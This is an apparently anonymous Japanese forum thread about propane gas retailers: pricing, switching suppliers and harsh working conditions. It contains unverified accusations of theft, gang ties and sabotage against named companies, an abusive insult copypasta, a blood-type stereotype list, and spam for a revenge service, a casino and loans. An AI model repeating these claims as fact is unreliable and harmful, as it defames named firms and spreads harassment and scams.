NGNG怒られたみたいです。よそではどうなのか知りませんが宿直は時間外労働という
ことで法律違反になるみたいです。入社してから普通にやってきたことなので宿
直自体が違法だと最近初めて知ったのですが、他の会社ではどのようにしている
のでしょうか?ちなみに宿直とは24時間体制で交代で従業員が在勤することで、
当社の場合通常業務をした上に宿直を行います。たてまえは、火事・地震等の災
害の緊急出動を目的としていますが、夜中に電話かけてくるヨッパライの相手や
集金や壊れた集中監視の相手がほとんどで寝不足になります。
0134名無しさん@お腹いっぱい。
NGNG132.133に集約されているとおり
どこも同じですよ!
0135元都市ガス社員
NGNG法律は分からないが当社では宿直無しです。夜間は留守番電話で、
転送電話持参した自宅待機者が、緊急時の用件の際だけ応対しています。
最初は、マズイのでは!?と思いましたが133の言うとおりヨツパライ
や常識知らずの客からの電話ばかりなので、これで良い気もしたりします。
近年はガス切れもまず無いから宿直せんでも良いのでは?ちなみにウチ
は小さいLPガス会社です。
0136学生
NGNG0137世間知らずのガス屋
NGNGています。私が住んでいる所は都市ガスが通ってなく、プロパンオンリーなんで
すが他社はだいたい無償配管を行っているみたいです。なので、客は目先の料金し
かみていないので当社は非常に不利です。基本料金的にみると他社より\500〜\700
位やすいのですがそこのところの良さが分かってもらえません。更にオール電化の
普及でなかなか新規の客が増えません。
0138日ガス@社員
NGNG「Oまもりさん」て倒壊じゃ保障付きガスとか言ってろくな説明もせず加入
させているようだけどあれって募取法違反行為だよね。
加入させている奴らは資格持っているのかな?
金融庁にチクルぞ!
0139名無しさん@お腹いっぱい。
NGNGそして今では客の取り合い。本当にクサイ893な業界です。
自分達では何の努力もしないでやれ都市ガスだオ−ル電化だと!フザケルナ。
T社、N社、S社、I社も皆潰れちまえ!その方が世の中のタメ。
0140名無しさん@お腹いっぱい。
NGNG三ツ輪産業だと営業職なら販売店回りが主になると思います。
プチ893の相手をしてまわる事になるでしょう。
ニチガスだと確実に個人宅に飛び込み営業+ハウスメーカー回りかな?
0141名無しさん@お腹いっぱい。
NGNGどのマークがどこのメーカーなのか一覧が載っているサイトってないでしょうか?
0142名無しさん@お腹いっぱい。
NGNG>自分達では何の努力もしないでやれ都市ガスだオ−ル電化だと!フザケルナ。
>T社、N社、S社、I社も皆潰れちまえ!その方が世の中のタメ。
伏字になってますがT社、N社、S社、I社ってのは
都市ガス会社や電力会社のことなんでしょうか?
0143名無しさん@お腹いっぱい。
NGNG0144名無しさん@お腹いっぱい。
NGNG関東の四大悪徳プロパン屋のT=倒壊、N=にちガス、S=笑話実業
I=愛エスがすてむの事ですが何か?
0145名無しさん@お腹いっぱい。
NGNG?
プロパン屋が都市ガスやオール電化を推進してるということですか???
0146名無しさん@お腹いっぱい。
NGNGおいらの書きコが悪かった。
プロパン屋が自分達のことを棚に上げて都市ガスやオール電化の事をああでもない
こうでもないといっている事を言いたかった。それだけ。
0147名無しさん@お腹いっぱい。
NGNG0148名無しさん@お腹いっぱい。
NGNGその通り。
縄張り争い等、やっている事は893と変わらんゾ。
警察に通報しろ。
0149名無しさん@お腹いっぱい。
NGNG0151名無しさん@お腹いっぱい。
NGNG0152たがめ
NGNG彼の話では昭和ガス、ISガスは使用料金の他に設備維持利用料を取り、
違法な他、料金的にもお得な話をしていきましたが、皆様のカキコを
読んでいると、どこもの業者も同様、怪しい雰囲気がしています。
確かに業者を変更する事によって料金が下がるのですが、変更後の
値上げ等不安なものがあり、本当に変更していいのか、詳しい方、
教えて下さい。
0153そこらのガス屋
NGNG設備維持利用料を取るのは必ずしも違法ではない。
工事をした時に工事代を支払っていなければとられる可能性はある。
ただ今までは基本料金の中にぶっこまれていて判らなかっただけ。分けてちゃんと表現するのはある意味では
良心的とも言える。どこの世界にタダで設備工事をする業者がいるかい?
良く言うだろう「タダほど高い物は無い」
変更後の値上げは絶対有ると覚悟した方がいい。値上げの理由なんかいくらでも有る。
素人は騙されないようにせいぜい気をつける事!
0154名無しさん@お腹いっぱい。
NGNGhttp://www.sankei.co.jp/news/021107/1107sha066.htm
0155たがめ
NGNG早速のレスありがとうございます。
来週、昭和ガスの営業担当の方と話し合いする事になりました。
今の業者が値下げしてくれても、後々値上げがあるかも。
皆さん、いろいろ大変ですね。
0156そこらのガス屋
NGNG判れば宜しい!
日痴ガスで有ろうが笑話ガスであろうがどちらでも大差は無いが、くれぐれも倒壊だけには
替えてはいけない。
後で恐ろしい仕返しがあるぞ!
0157名無しさん@お腹いっぱい。
NGNG0158名無しさん@お腹いっぱい。
NGNG0159弱小ガス屋
NGNG河原○業も怖いっすよ!
昔は、営業が現ナマ持って新築現場に飛び込んで
物件取ってたけど、金を持ち逃げしてトンずらこく
野郎続出で、方針を変えたというマヌケなガス屋。
0160中間”管理”職です
NGNGこれからLPガス販売業、卸問屋に就職希望される方へ。
数学と化学に自信、興味がない方は辞めましょう、入社したところで飛び込み営業や雑務をやらされてぽいです。
最悪、配送をやらされ体が壊れて終了です。
結局この世界も、資格、技術がすべて、なにも出来ない奴は誰でも出来るところに回されて、使い捨て。
最低でも丙種科学、出来れば丙種簡易ガス技術者の免許がないと話にもなりません。
設備士や、販売主任なんかは「はくち」でも取得できます。(笑
就職を考えているみなさん、配送や飛び込み営業は一生は出来ません、しかし、ある程度の資格さえ取ってしまえば私のように事務所で事務の女の子をからかって遊んでいられます!
どうですか?頭脳に自信はありますか?
所詮この業界は馬鹿の集まり、一般レベルより少し出来れば楽できます。
熟慮されたし。
0161名無しさん@お腹いっぱい。
NGNG×丙種科学
○丙種化学
お前、ひょっとすると、バカだろ?
0162笑っちゃうよ!
NGNG何もしていないように見えるガス屋は、必ず大手のガス屋に守られているだけだ。
唯一、真面目にまともな仕事をしているのは俺だけだ!!
0163名無しさん@お腹いっぱい。
NGNG業者を替えようと思いました。するともともとの業者が、基本料
1500 / 280まで下げると言って来ましたが、もっと下げられますか?
神奈川です。ご指南お願いします。
0164名無しさん@お腹いっぱい。
NGNG単価にしろ!っと一喝。
一般家庭でも300円から、もうちょい下げられるかも。
つうか、1500 /280も高いよ。
0165163
NGNGレスありがとうございました。
>>単価にしろ!っと一喝。
これってどう言う意味ですか?スミマセン
あと、300円って基本料金ですか?
逃げられそうと分かったとたん焦って言い訳いいまくりの担当者が
(今日は不在と言ったのに)電話&訪問しにきました。
今迄知らなかった自分もバカだったけど、なんか、むかむかして
しょうがないのでどうぞご指南お願いします。
0166hoge@LP-gas
NGNGどこのガス屋よ!?
平塚のガス屋は悪質なのが多いからな・・・
販売店によって対応は変わる、うちも二ヶ月で3回ガスや変えた。
訪問する気持ちは分かるがある意味嫌がらせ。
0167163
NGNGどこの…って元々のガスやさんですか?
Kです。ここの板では多分名前でてなかったような…。
0168165
NGNGガス屋ではないのですが、昨今の騒動で非常に興味がありいろいろ調べました。
0169そこらのガス屋
NGNGガス屋なんか893と同じ!
強いモノには安く、弱いモノには高く。←これガス屋の常識。
シロウトはせいぜい騙されないように注意すべし。
0170名無しさん@お腹いっぱい。
NGNG0171名無しさん@お腹いっぱい。
NGNG無し
0172164
NGNGつまり
300円X使用量X1.05(消費税)て事。
10で3150円。
貴方のは値下げして10で4515円。
安いけどまだまだ下げられます。
0173名無しさん@お腹いっぱい。
NGNG0174名無しさん@お腹いっぱい。
NGNGガス屋に教育なんて必要なし!
必要なのは「体力」と「根性」だ!
とS社の社長は言っておった。
0175名無しさん@お腹いっぱい。
NGNG0176名無しさん@お腹いっぱい。
NGNGうそうそ。今年は2週間半でした。高学歴の人からやめていくらしい。
今年入ってやめた奴、結構いいところに再就職したみたい。
職歴に傷がつく前にやめたのが良かったらしよyo
0177名無しさん@お腹いっぱい。
NGNG料金は安いが保安がだめならしょうがないよ。ニ△ガスみたいにね。
表に出ない小さな事故は頻繁に起きている。ね!○チガスさん!!
いくら金を払ってもみ□してるの?もしかして、’知らない社員がいたりして’
0178名無しさん@お腹いっぱい。
NGNG二ちゃんねらーの中でもこれだけ恨みを持つ人いるのだから。
横浜インター付近にあるニチガスのネオン。フォントが不気味すぎる。
0179名無しさん@お腹いっぱい。
NGNG0180一般人
NGNG使用量は月30?位です。埼玉北部です。
0181名無しさん@お腹いっぱい。
NGNG基本料金なしの200〜250円は出すよ。
当然ガスボイラー使用が条件ですけど
30もガスを使用してるのだから
まだまだ妥協しない方がいいと思います。
0182名無しさん@お腹いっぱい。
NGNG多分ガスの原価(にちガスの仕入れは知らないが)は45円/Kgで配送費等の経費
が25円/Kgとすると原価は70円/Kgだろう。
1Kgのプロパンが気体になると約0.5m3だからm3辺りの原価は140円位のはず。
後はどの位利益を取るかだが、まあ一般家庭用でm3辺り200円に出来たら上出来だ
ろう。
まあせいぜいがんばりな。
0183おい!182
NGNGお前がいってるほかにも保安などの費用がかかるんだよ!!うちの会社は保安は二の次だけど(本当は百の次くらいだけど)
今日、相模原にTOKAIの切り替えに行ったけど、TOKAIの社員は言っていることに筋が通っていてしっかりしてたな。
うちのやり方は客を騙して獲得しているようなものだから(○本はとくに)
そろそろニチガスなんてやめてえー
0184名無しさん@お腹いっぱい。
NGNGあと大口なら単価108円があった。
某大手うどんチェーン(安い割には無駄な出動が多かった)は単価140円だし、
すかいらーくチェーンだと西の営業部長(今は支店長だっけ)の関連で・・・
場所言ってもいいけど、場所からばれてしまうので北関東だけヒントに言っておくでぇ。
っつーか新規のコード98122のほうは止めたらしいが、99213だと新規取れないなんでねーの?
まあ、TOKAI対策で日曜も出てるご苦労な会社だ。
研修終了翌日に辞めたやつと1年くらい勤めて辞めたやつが優良な就職先見つけたらしいな。
結局長く勤めたからって人間的に成長しない会社だな。ホント。
0185名無しさん@お腹いっぱい。
NGNGお前は今までずっとそうやって生きてきたな(WWW自分にとって都合のいい話しか聞かない豚野郎(WW
不快になる、反論される話は全く聞く耳を持たないんだろ(WW豚きわめりだな(WW
なぜ自分の卑小さを省みず、常にそんな傲慢な態度をふるえるんだ(WW
お前のような豚は、常に自分の精神状態を気持ちよくする事しか考えてないからだろ(WW
この世を自分中心…豚中心(WW豚世界(WWお前が人間と会話する時は、論議するとか、
意味のある話をしようとか、そういうのがまったくない。ただアフォ豚が気持ちよくなれればそれでいい
自己豚満足しか頭に無い、典型的オナニー豚(WWW
まさに幼児豚がする会話。幼稚豚の典型(Wお前の話は、ゴミだよ豚ちゃん(WWW
イカレ豚のオナニーその最もたるは、お前が書いてきたレスだよ。そして自演ことバレ豚芝居(WWW
なぜあんなレスをしかできない?あんなサトラレ豚芝居をする?自分ではわからないだろうな(W
それは、ただ自分が気持ち良くなりたいという豚望の結果ですよ(WWW
真正面から否定する文は、オナニー豚には通用しまい(Wお前は誰にも論破できない(WW
論破できないというよりは、議論自体できない訳ですが(WWW
豚は豚を不快にする文を受け入れられるような理論的人間じゃないからだ。
つまりオマエが豚だからだよ豚野郎(WWW話の通じない狂豚。狂気豚見参(WWW
ハナから戯言と決めつけることによって、どんなことをいわれても豚の精神状態を
安定させようとする。豚に都合の悪い事は見えません、豚目、豚耳、豚口(WWW
豚のお前にしてみれば、豚が不快になる文は、「バカじゃん」「ただのキチガイ」「で?」で済まされてしまうだろう(WWWそんな事をしていては、他人と論ずる事などできる訳がない(WWW論ずる事など元からアフォ豚にはできませんが(WWできる事はコピペと豚芝居(WWW
とどのつまり、豚ちゃんはハナから他人と論ずるだけの脳味噌を持っていないってこと。
そして、そのレスはすべて何の価値も持たないゴミだということだ。
オマエには何にもできないよ豚ちゃん。ネタ職人などと都合の良い冠が欲しいのか?(WWW
0186名無しさん@お腹いっぱい。
NGNG0187名無しさん@お腹いっぱい。
NGNG馬鹿にされてるね
0188名無しさん@お腹いっぱい。
NGNG0189名無しさん@お腹いっぱい。
NGNG0190名無しさん@お腹いっぱい。
NGNG●復讐・貴方に代って恨み晴らします!★★★別れ工作★★★
騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠収集・★★★仕返し代行★★★悩み事相談★★★
●電話番号から住所などの調査・等など★何でも気軽に相談OK!
確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
●下記記載のURLがジャンプしない場合には・コピ−してファイルから開いて下さい! ・・・マル秘事件簿・緊急殺人現場・・・
http://www.blacklist.jp/i
(緊急情報)必ずご覧下さい★驚愕の事実&復讐の実態★★★
●女性秘密工作員・募集中!高収入確実!!!
http://www.blacklist.jp/
リンク・興信所・・> http://www.okudaira.co.jp/
------------------------------------------------
0191名無しさん@お腹いっぱい。
NGNGイイ大学出た奴からやめてくって奴だな。
今年も某国大でたやつすぐ辞めたけど研修中での「ガスってどんなものでしょうか」
との質問に、大学で化学勉強した俺よりもめちゃくちゃ詳しく答えてた。しかも文学部出身の奴!
ノホホンとしたイイ奴だったけど、やっぱりDQN大学の俺とは違うと思った。
逃げるが勝ちとは正にこのことだな。
0192名無しさん@お腹いっぱい。
NGNG初めまして。
私3月27日にニチガスに入社して、研修終わったとたんやめました。
元々西日本の大学に行っていましたから、関西の方に就職したいと
思いましたが、実家から通えるんならと思ってニチガスに入ったら
(面接で、家から通えるからその点は安心しなさいといわれた)
いきなり北日本ガスに飛ばされました。北日本ガスは割と雰囲気が
良さそうでしたし、2時間弱の通勤時間はややきついものの電車は
下りで楽なのでで通勤しようとしたら、借金取りに追われた
人が住むような寮に強制収容されそうになり、さらに引越し代も
渋る感じでしたのでやめました。
つまり、一人暮らしまでして勤める価値のある会社ではないと判断したのです。
(小山のニチガス+汚い部屋で一人暮らし)<(家から通勤できる小さな会社)
さらに親にとっても、子会社出向により保証人をもう一度書かせる
ことに腹をたてておりまして、一家そろってニチガスにはかなり呆れています。
この掲示板もっと早く見ていたらよかったけどなぁ。
私は既卒になってしまったからもう普通の大学4年生と同じような就職活動
はできません。大げさに書くと一生台無し・・。
私なんか、小さい頃から塾に行かず現役で大学に入れたから損失は
小さいものの、同期には恐らく2浪して入ったであろう早稲田生(越谷営業所)がいるから、
2浪して早稲田に入ってニチガスじゃあ可愛そうすぎると思った。
もとニチガスさんとも話し合いたいなぁ。
ちなみに今年の新入社員でこの掲示板見ている人が何人もいて、かなりの人が既に士気なくしている模様。
0193岩谷社員
NGNG岩谷にしておけばよかったのに・・・
0194名無しさん@お腹いっぱい。
NGNGニチガスに入ってしまったのは、気の毒でした。社員の中には役員を殺してやりたいと思っている者がたくさんいる。
そんな会社に入社してしまったお前にも責任はあるぞ!どうせ大学生のときに女の尻を追っかけて4年が過ぎたんだろ。
そんな奴しかニチガスには入社しないよ!!社長からしてそうだから!!
俺もニチガスに入社したということは同じ穴の狢か?でも、すぐに見切りをつけたお前は偉いよ。
今度は失敗しないように慎重に就職先は探してくれ。頑張れよ!!!
0195名無しさん@お腹いっぱい。
NGNG0196名無しさん@お腹いっぱい。
NGNGがある。営業所は平日休み、本社は休日はカレンダ−通り、ふざけんなという感じ。
しかも事務を除く営業所員は休みなんかないようなもの。本社の奴らはたまに営業所を巡回して
「がんばってくれ」と激励するだけ。俺はここにいても所長どまりだというのを察知して
退職を申し出たんだよ。そしたら、人事課長さんに考えなおせといわれたよ。
やはり営業がいないと困るのかな?正直営業以外はそんなに人数がいらないもんね。
ニチガス全社員が400人だとしたら本社社員は40人もいらない。
40過ぎて営業所の所長なんかやりたくないもんね。
退職理由?ずっと現場(営業)なのがわかったから。頑張れば君も出世出来るなんていう
のは所詮立て前の話。本音は店舗を増やすために使い捨ての社員がほしいだけなんだよね。
0197名無しさん@お腹いっぱい。
NGNGだいたい、2〜3年周期で使い込みばれるボケがでてきて、
充填所送りになるぞ。まあせめて、東ガスの研究室とかぐらいなら
少しは人のためになるかな。
0198名無しさん@お腹いっぱい。
NGNG成績が上がらないからって給湯器の基盤こわさないでね
0199名無しさん@お腹いっぱい。
NGNGないとガス屋にしかなれないよ」と言っていた。
オレも「その通りだ。よく勉強しろ」と心の中で言った。
終わり。
0200名無しさん@お腹いっぱい。
NGNG0201名無しさん@お腹いっぱい。
NGNG7〜8年経った給湯器は片っ端からぶち壊しです。
点検でーすと偽り、買い替えを勧めます。
0202名無しさん@お腹いっぱい。
NGNG今日もやりたくもない仕事をやらされた。切替元のガス屋にボンベとメーターを
返しに行かされた。そんなことはやりたくないんだよ!
偉そうにしてる連中が返しに行けばいいんだよ!
嫌な仕事をやらされて給料が安く、手を汚さない奴が給料が高いなんてやってられねえよ!!
0203名無しさん@お腹いっぱい。
NGNG0204名無しさん@お腹いっぱい。
NGNGガス料金もロクに払わない顧客と折衝し嫌味を言われ、
新規が少ないと上司にののしられ、
休みもろくに取れなく、給料も安い。
あなた方はフリーターと本質的には同じなんですよ。営業は使い捨て要員。
そういうシステムを理解している人は決して入らないニチガス(もといLP)。
それに気づかずに年とって、転職もできなくても俺は同情しないけれどね。
そもそもニチガス出身で30過ぎて転職成功したやついるのか?
0205名無しさん@お腹いっぱい。
NGNGというときに阻止されてしまうのがニチガスです。
お客の所へ行って解約の書類を書かせるのが面倒なので
転換の書類を送らないで下さい。
ちなみに20件転換の書類が来て18件解約させました。
残りの二件は3ヶ月後に取り返しました。
ニチガスさん余計な仕事を増やさないで下さい。
0206名無しさん@お腹いっぱい。
NGNG転換→切り替え
解約→撤回
業界用語も知らないようだし、文章表現能力もないやつだな(w
おまえ、素人丸出しだよ。
それか、ニチガスに顧客取られた個人商店だろう。
どちらにしろプロパンはバカの集まりだな。
0207都市ガスマン
NGNGどちらにしろプロパンはバカの集まりだな。⇒206おまえもな
0208名無しさん@お腹いっぱい。
NGNGガス屋自体が馬鹿の集まりだろ。
(o^∇^o)
0209都市ガスマン
NGNGそりゃそうだ。
返す言葉が見つからない自分が悲しい。
0210名無しさん@お腹いっぱい。
NGNG0211名無しさん@お腹いっぱい。
NGNGもとニチガスマンさんを始めレスありがとうございます。
そういえばニチガスはあいおい損保と法人契約している
みたいだけど、ニチガスの営業車は他の会社の営業車と比べて事故率が
10倍ですって。2倍ならなら分かるけど10倍とは・・・・。
おかげで、ニチガスの保険等級下がっちゃって保険料が会社を圧迫しているとのこと。
それだけ会社に対して恨みがあるか、ガラの悪いのが集まっているのかな。と思った。
研修中も上司が「うちの会社ろくなことやっていなから」
とか「うちの会社とても一部上場とは思えませんから」とか言うから、
大体会社への忠誠心が分かる。
小山の通勤の話ですが「万が一何かあった時にすぐに集まれるように、通勤1時間以上
かかる者は寮に住まわせてる」とはいえ、一時間で通える春日部に住んでいた同期まで
寮に移住させているのは交通費をケチっているとしか思えない。ああいうのは多分棟ご
と包括して借り上げているから、僕が入るとしても追加費用かからない。つまり会社は
交通費が丸々浮くってわけだ。
そもそも、僕みたいな新入社員まで動員しなきゃいけない事故が起きればあの会社つぶ
れると思うが・・・。
0212名無しさん@お腹いっぱい。
NGNGらん。例えば面接時に事務で採用すると言ったのに、研修時にはみんなの能力を見るか
ら入社式まで分かりません何ていうからみんなブーブーいっていた。面接どころか、
あんなグループ研修では個人の才能なんて分からないと思うけど・・・。
因みに今年の同期で有名な?大学出身者は早稲田と明治の二人位かな。
出身大学で頭の良し悪しなんてきまらないけど。
早稲田の子はどこかの営業所で、明治の子は本社勤務でした。
それから研修時に気になっていた事は、ガス会社に勤めたのに自分のうちのガス会社が
どこなのか、酷いと自分のうちがプロパンなのか都市ガスなのかも分からない子がいた。
僕は引越が多かったせいか、小学校のころからガスの種類なんて言っていたけど。
今年の同期は6Cとかの石油ガスと13Aとかの天然ガスの種類の違いなんて知ってい
るのかなぁ。
ps ニチガスの幹部は、社長が浜田出身なのでかなりの部分島根県出身者で占められて
います。今の新入社員はそんなこと無いけどやはり中国地方に縁がある人多し。別に悪いことじゃないけど。
0213名無しさん@お腹いっぱい。
NGNG0214名無しさん@お腹いっぱい。
NGNG月120万位稼いでた。
ちなみに、1軒4万円の時代でした。
ありがとう、ニチガス
ありがとう、地元のアフォーガス屋さん。
0215名無しさん@お腹いっぱい。
NGNG「T2(TOKAI)対策で最低でも毎月一件は取ってきて…」
「皆さんの頑張りが会社の発展に…」
「ニチガスは公務員とは違い実力主義なので…」
もう聞き飽きた。
212の言うとおり、ニチガスは個人の才能なんて関係ありません。
同じ営業でもパワーポイントを使った企業相手の営業や、新製品の販売、広報などの
プレゼン能力が要求される営業とは違い、
個人宅、ハウスメーカーに新聞の切抜きを見せて、
「プロパンの料金は高い、ニチガスのプロパンは安いからうちに換えてください。」
と飛び込み営業する会社です。
結局、能力的には何も必要ありません。
逆にいうとこの会社で身につくものがありません。
0216名無しさん@お腹いっぱい。
NGNG個人商店にボンベを返しに行って店主がボンベを運んでる間に金庫からお金を盗んだのも
ニチガスの社員だったっけ?それが表ざたにならないようにお金で処理したのもニチガス
だった思いました。
0217名無しさん@お腹いっぱい。
NGNGだとは思わずビックリです。
検針も電話回線から自動で読み取っているようです。
昼間家に居ないのでボンベの配達の人とも会った事がありません
だけどボンベ交換に来たのは分かります。
庭の砂利と芝生がめちゃくちゃになってるからです。
おまけに門を開けたまま閉めて行きません。
値段はよく分からないので不満はありませんがガス会社を変えようと思ってます。
0218名無しさん@お腹いっぱい。
NGNG紳士的な切り替えしてるし、暴力振るわないし。
>>216のようなことは決してやりません。←やるとしたら昭和
ただし切り替えノルマが多く、>>215、>>202のような現役社員にとって見れば最悪な会社です。
217さんの検針伝票の中に料金コードって書いてあると思うのですが、
98206と記入されていたらすぐに会社替えたほうがいいです。
0219名無しさん@お腹いっぱい。
NGNGA型の特徴
●とにかく気が小さい(臆病、二言目には「世間」)
●ストレスを溜め込んでは、キレて関係ない人間を巻き添えにして暴れまくる(小心者のくせに短気)
●自尊心が異常に強く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする(ただし、相手を表面的・形式的にしか判断できず、実際にはたいてい、内面的・実質的に負けている)
●他人の忠告を受け入れない、反省できない、学習能力がない(自分の筋を無理にでも通そうとするため)
●「常識、常識」と口うるさいが、実はA型の常識はピントがズレまくっている(日本の常識は世界の非常識)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者に対してはへりくだり、弱いものに対してはいじめる)
●あら探しだけは名人級(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため、性格がうっとうしい(根暗)●一人では何もできない、女は連れションが大好き(群れでしか行動できないヘタレ)
●多数派(注・日本では)であることをいいことに、少数派を馬鹿にする、排斥する
●異質、異文化を排斥する(差別主義者)
●集団によるいじめのパイオニア&天才
●悪口、陰口が大好き(性格極悪)
●他人からどう見られているか、体裁をいつも気にしている(「世間体命」、「〜みたい」とよく言う)
●DV夫が多い(特にB型やAB型の女に対して、世間体を気にするあまり)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度も言う、知障)
●頑固で融通(応用)が利かず、表面上意気投合しているようで、腹の中は各自バラバラ(しかも考えていることは驚くほど幼稚)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自分は常に自己抑制しているもんだから、自由に見える人間に嫉妬し、徒党を組んで猛烈に足を引っ張ろうとする(ねたみが人一倍強い)
●おまけに執念深くしつこい(「一生恨みます」タイプ)
●自分に甘く他人に厳しい(自分のことは棚に上げて、まず他人を意識する・冷酷)
●女々しい、あるいは女の腐ったみたいな考えのやつが多い
0220名無しさん@お腹いっぱい。
NGNG既存ガス屋の特に、二代目社長に多い症状ですね。
いい加減変わってほしい物です、この業界の体質も・・・
御覧の皆さんも気が付いてるとは思うが、
このスレ自体がプロパンガス業界実態!
全く持って旧態依然、けしからん!!
0221名無しさん@お腹いっぱい。
NGNG0222GAS
NGNG確かに冬場の需要期なんかはみんな殺気立ってたなあ。
LPG商社とか言って偉そうにしてたけどなんのことはないDQN業界なんですね
やめてよかった。
0223名無しさん@お腹いっぱい。
NGNG管理課はチェックしているな。
上層部はアフォだからここまでこれないだろう。
0224名無しさん@お腹いっぱい。
NGNG面倒だからやらないんでしょ!?
ダカラつけあがるんだよ!
今がチャンスでないの?
0225山崎渉
NGNG0226名無しさん@お腹いっぱい。
NGNG0227名無しさん@お腹いっぱい。
NGNG去年まで金無し君だったけど、オンラインカジノとパチンコで
二年で350万貯めた。一度やってみなよ。
初回のみだけど、1ドル以上のチップを買えば30ドル(4000円くらい)貰える。
もらうだけもらってプレイせずに換金することもできるし、ルーレットで赤か黒に
思い切って賭けてしまえば50パーセントで二倍になる。
金なきゃオフラインでゲームすればいいだけ。暇つぶしになる。
ビデオポーカーとかスロとか色々あるのでマジでお勧め。
http://www.imperialcasino.com/~1h4n/japanese/
0228山崎渉
NGNG0229名無しさん@お腹いっぱい。
NGNG0230名無しさん@お腹いっぱい。
NGNG0231京葉
NGNG0232山崎渉
NGNG0233kj
NGNG0234名無しさん@お腹いっぱい。
NGNG0235名無しさん@お腹いっぱい。
NGNG何か知ってる人います??
良さげに見える会社だけど、実は大したことないみたい、、、、、
0236名無しさん@お腹いっぱい。
NGNG0237名無しさん@お腹いっぱい。
NGNGヤー公がバックについてて、切り替えするとヤバイって聞いたぞ。
社会のゴミをバックにつけてる会社は会社自体がゴミだろう。
ゴミに違いない。
ゴミ決定。
0238元社員
NGNGガス会社のくせして、灯油頑張りすぎだよね
0239名無しさん@お腹いっぱい。
NGNGトータルエネルギーの営業さんへ
統一地方選が行われている間に現供給会社の悪口をお客様に言うと
“選挙違反”になる可能性があるから気をつけろよ。
市町村議あたりだと、プロパン屋の親爺が立候補している可能性あるからなw
0240名無しさん@お腹いっぱい。
NGNG的屋系は実際にガスを使用しているから、それなりに繋がっている会社は多い。
T社(パラサイト)は右翼団体幹部K光を役員にしていた。しかも実質トップのS山は羽毛布団と浄水器で悪徳商法をしていた。
今はおとなしくなった某中堅卸も直売をやり始めた頃はチンピラ使ってた。
と・・言うか・・
ヤクザの真っ当なシノギ(博打、的屋、守代など)が暴対法と不況で封じ込められていて
かつ、現代の若者は旧来のヤクザの修行に耐えられない者が多くなっている
で、今までならばヤクザの道を歩いていたような人がプロパンガス業界に流れ込んでいるの。
平成9年の規制緩和(許可制から登録制への変更)は官僚が目指したガス料金の緩やかな低下に向かわず、
同一社内の不明瞭な価格差拡大と本来ヤクザたるべき人間の流入を増加させただけと言う最悪の結果を招いている。
お客さんがヤクザの資金源にならないよう自分で身を守るしかないよね。
0241名無しさん@お腹いっぱい。
NGNGこの季節25立方使って、単価250円です。
都市ガスと同じレベルだから、とりあえず納得してるよ。
この値段で売り込めば売れると思うから、切替がんばってね。
0242スガチニ
NGNG0243名無しさん@お腹いっぱい。
NGNG0244名無しさん@お腹いっぱい。
NGNGhttp://www12.brinkster.com/nelmaker/js/index.html
0245名無しさん@お腹いっぱい。
NGNG悪いのはアパート建てた工務店にくっついたガス会社なんだけど、事情知らない住民は不動産屋かオーナーの悪徳業だと思ってるからね。
高い料金払わされてる客と、アパートのオーナーの為にも、切替屋さん、がんばってちょうだい。
0246名無しさん@お腹いっぱい。
NGNG切替一軒いくらもらってんだぁ?
4万?5万?営業するなタコ
ガスが一ヶ月1000円割高だって二年で24000円、
住み替えにかかる不動産諸費用を考えればガス代だけで出て行かないだろ。ボケ
「ガスも高いしなぁ〜」ってのは二次三次の要素だ。
>事情知らない住民は不動産屋かオーナーの悪徳業だと思ってるからね。
その通り、不動産屋かオーナーが悪徳なんだよ。
0247名無しさん@お腹いっぱい。
NGNGどこの切り替え屋が来ても、「うちではチョット」
と言って帰っていく。なんで?
ここのスレ見ていると、基本1750円単価370円リース代260円を
払い続けるのが、バカらしく感じてしまう・・・
0248名無しさん@お腹いっぱい。
NGNGんじゃ、切替屋に負けねぇ値段出してごらん。
要はガソリンスタンドと同じ、客にとってはガスは単に燃料であり、モノが同じなら安い方選ぶのは当然だ。
>247
その中央液化ガスとやら、そのスジ系だったりして!
給湯器は消費量の大部分を占めるから、灯油給湯器のカタログちらつかせてみてはどぉ。
灯油の燃費は大手都市ガスの半分だよ。
0249名無しさん@お腹いっぱい。
NGNGフリーダイヤルでかけると倒壊に繋がるらしいね。
ガスコンロの電池切れで五千円請求されたっていう話聞いたけど…
切替後のガス屋への支払い関係(毎月の支払い、修理時など)詳細きぼーん
0250名無しさん@お腹いっぱい。
NGNGこういうタイプの客は、他の原因で故障がおきるとどうなるか熟練した修理屋は知っている。
だから、怪しそうな場所を点検したり、場合によってはこっそり修理してるんだよ。
0251名無しさん@お腹いっぱい。
NGNGこれ見るだけでどんな会社かわかろうってもんだ。
0252(σ・∀・)σ
NGNGhttp://digikei.kir.jp/
http://digikei.kir.jp/img1.html
0253名無しさん@お腹いっぱい。
NGNGさっそくの情報ありがとうございます。
247です。
ですが、既に色々な手を使って値引き交渉しているのですが、
一向に取り合ってもらえないのです。
しまいには「そんなに沢山のガス屋さんが来るなら切り替えても構いませんよ、
但し切り替えの際に8万円位かかりますけどね・・・」
なんて事をぬかしやがるのです。
ちなみに、8万円というのは配管設備代との事ですが、俺の家は配管も設備も不動産書類で
自分の物となっているようなんですが
その事を伝えると二言目には「じゃあ裁判でハッキリさせましょう」
みたいなことをほのめかします。
0254山崎渉
NGNG0255名無しさん@お腹いっぱい。
NGNG0256山崎渉
NGNG( ^^ )< ぬるぽ(^^)
0257名無しさん@お腹いっぱい。
NGNG灯油給湯器入れちゃえ
0258名無しさん@お腹いっぱい。
NGNG0259名無しさん@お腹いっぱい。
NGNG良い選択だと思う。
0260名無しさん@お腹いっぱい。
NGNGhttp://www.dvd01.hamstar.jp
0261動画直リン
NGNG0262名無しさん@お腹いっぱい。
NGNG参考にしてみては
LPガス取引適正化・料金透明化に向けた措置
↓
ttp://www.enecho.meti.go.jp/beforeenecho/lpg/pages/9901025b.html
0263名無しさん@お腹いっぱい。
NGNG先月、20で一万って・・・。
0264:
NGNG☆^〜^★ 50音順で探せて楽して得する
http://sagatoku.fc2web.com/
あなたの探し物きっとみつかるよ☆^〜^★
0265名無しさん@お腹いっぱい。
NGNG借入件数が多くなってしまった方、失業中の方、
フリーターの方、ご安心下さい。当社は皆さんの生活を
